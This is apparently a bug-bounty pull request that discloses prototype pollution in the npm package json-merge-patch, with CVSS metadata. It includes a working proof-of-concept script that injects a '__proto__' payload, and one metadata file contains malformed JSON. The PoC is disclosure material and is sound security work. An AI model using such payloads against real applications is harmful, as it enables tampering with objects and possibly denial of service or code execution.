### PR TITLE
Prototype pollution in json-merge-patch

### DIFF
--- a/bounties/npm/json-merge-patch/1/README.md
+++ b/bounties/npm/json-merge-patch/1/README.md
@@ -1,0 +1,26 @@
+# Description
+
+`json-merge-patch` is vulnerable to `Prototype Pollution`.
+This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a `proto` payload, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+let jsonmergepatch = require("json-merge-patch");
+jsonmergepatch.apply({}, JSON.parse('{ "__proto__": { "polluted": "Yes! Polluted" }}'));
+console.log(polluted);
+```
+2. Execute the following commands in another terminal:
+
+```bash
+npm i json-merge-patch # Install affected module
+node poc.js #  Run the PoC
+```
+3. Check the Output:
+```
+Yes! Polluted
+```

--- a/bounties/npm/json-merge-patch/1/vulnerability.json
+++ b/bounties/npm/json-merge-patch/1/vulnerability.json
@@ -1,10 +1,10 @@
 {
-    "PackageVulnerabilityID": 1,
+    "PackageVulnerabilityID": "1",
     "DisclosureDate": "2020-09-14",
     "AffectedVersionRange": "*",
     "Summary": "Prototype Pollution",
     "Contributor": {
-        "Discloser": "",
+        "Discloser": "gkmrr",
         "Fixer": ""
     },
     "Package": {
@@ -32,7 +32,7 @@
         "E": "",
         "RL": "",
         "RC": "",
-        "Score": "7.3"
+        "Score": "5.6"
     },
     "CVEs": [
         ""

--- a/bounties/npm/json-merge-patch/1/vulnerability.json
+++ b/bounties/npm/json-merge-patch/1/vulnerability.json
@@ -1,0 +1,54 @@
+{
+    "PackageVulnerabilityID": 1,
+    "DisclosureDate": "2020-09-14",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "json-merge-patch",
+        "URL": "https://www.npmjs.com/package/json-merge-patch",
+        "Downloads": "300000"
+    },
+    "CWEs": [
+        {
+            "ID": "CWE-74",
+            "Description": ""
+        }
+    ],
+    "CVSS":
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "7.3"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/pierreinglebert/json-merge-patch",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "Pierre Inglebert",
+        "Name": "json-merge-patch",
+        "Forks": 6,
+        "Stars": 42
+    },
+    "Permalinks": [
+        "https://github.com/pierreinglebert/json-merge-patch/blob/master/lib/apply.js#L23"
+    ],
+    "References": []
+}


### PR DESCRIPTION

# Description

`json-merge-patch` is vulnerable to `Prototype Pollution`.
This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a `proto` payload, which may result in Information Disclosure/DoS/RCE.


# Proof of Concept

1. Create the following PoC file:

```js
// poc.js
let jsonmergepatch = require("json-merge-patch");
jsonmergepatch.apply({}, JSON.parse('{ "__proto__": { "polluted": "Yes! Polluted" }}'));
console.log(polluted);
```
2. Execute the following commands in another terminal:

```bash
npm i json-merge-patch # Install affected module
node poc.js #  Run the PoC
```
3. Check the Output:
```
Yes! Polluted
```

💥 Impact
It may lead to Information Disclosure/DoS/RCE.

✅ Checklist
In my pull request, I have:

- [x] Created and populated the README.md and vulnerability.json files
- [x] Provided the repository URL and any applicable permalinks
- [x] Defined all the applicable weaknesses (CWEs)
- [x] Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
- [x] Checked that the vulnerability affects the latest version of the package released
- [x] Checked that a fix does not currently exist that remediates this vulnerability
- [x] Complied with all applicable laws